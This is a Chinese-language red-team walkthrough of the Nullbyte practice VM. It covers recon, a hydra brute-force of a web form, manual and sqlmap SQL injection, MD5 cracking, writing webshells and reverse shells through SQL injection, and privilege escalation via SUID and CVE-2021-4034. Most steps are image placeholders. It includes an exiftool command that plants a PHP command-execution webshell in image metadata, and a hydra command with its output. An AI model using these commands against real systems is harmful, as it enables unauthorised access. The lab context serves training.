第十五篇红队笔记-百靶精讲之Nullbyte-exiftool图片-hydra表单-john md5-sql大小马-CVE-2021-4034

本文介绍: 源码无发现，下载静态资源 look 可能是ssh 密码，可能是mysql 密码，最后是web 路由。

nmap 信息 收集

在这里插入图片描述

web 渗透

在这里插入图片描述

源码无发现，下载静态资源 look
可能是ssh 密码，可能是mysql 密码，最后是web 路由

h y dr a 暴力破解 web 表单

确定是需要的登陆和不需要验证码的表单

SQL注入

数据库猜解-布尔类型

在这里插入图片描述

手动

测试 字段 个数

在这里插入图片描述

数据库 信息

在这里插入图片描述

再次获取数据库

在这里插入图片描述

获取数据表

在这里插入图片描述

获取数据 表字段

在这里插入图片描述

获取数据 表字段值

在这里插入图片描述

sql map

获取数据库

在这里插入图片描述

获取数据表

在这里插入图片描述

获取数据 表字段

在这里插入图片描述

获取数据 表字段值

在这里插入图片描述

Joh n 暴力破解 md5格式 hash

base64解密

在这里插入图片描述

md5解密

joh n
hash cat(破解文本写前，字典写后)

获得系统 初始 权限 shell

在这里插入图片描述

SQL注入–写入一句话木马

system 类型函数是命令执行而不是代码执行
e val 类型函数是代码执行而不是命令执行（一句话木马）

SQL注入–写入 反弹 shell

在这里插入图片描述

提权

SUID可执行文件 提权

搜索备份文件

CVE-2021-4034提权

在这里插入图片描述

其他

e xi f tool

图片工具

#查看所有信息
exiftool photo.jpg
# 为一个图片生成图片码，图片码为我们的木马
exiftool poc.jpg -documentname="&lt;?php echo exec($_POST['cmd']); ?&gt;"

h y dr a 表单爆破

└─$ hydra 10.0.2.10 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l zgc -P /usr/share/wordlists/rockyou.txt                                           │Image Width                     : 235
Hydra v9.4 (c) 2022 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, t│Image Height                    : 302
hese *** ignore laws and ethics anyway).                                                                                                                               │Has Color Map                   : No
                                                                                                                                                                       │Color Resolution Depth          : 8
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-04 01:14:19                                                                                     │Bits Per Pixel                  : 1
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task                                                      │Background Color                : 0
[DATA] attacking http-post-form://10.0.2.10:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key                                                                             │Comment                         : P-): kzMb5nVYJw
[STATUS] 4566.00 tries/min, 4566 tries in 00:01h, 14339833 to do in 52:21h, 16 active                                                                                  │Image Size                      : 235x302
[STATUS] 4652.00 tries/min, 13956 tries in 00:03h, 14330443 to do in 51:21h, 16 active                                                                                 │Megapixels                      : 0.071
[80][http-post-form] host: 10.0.2.10   login: zgc   password: elite                                                                                                    │                                                                                                                                                                       
1 of 1 target successfully completed, 1 valid password found                                                                                                           │┌──(kali?kali)-[/tmp]
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-04 01:19:45                                                                                     │└─$ vi 2main.gif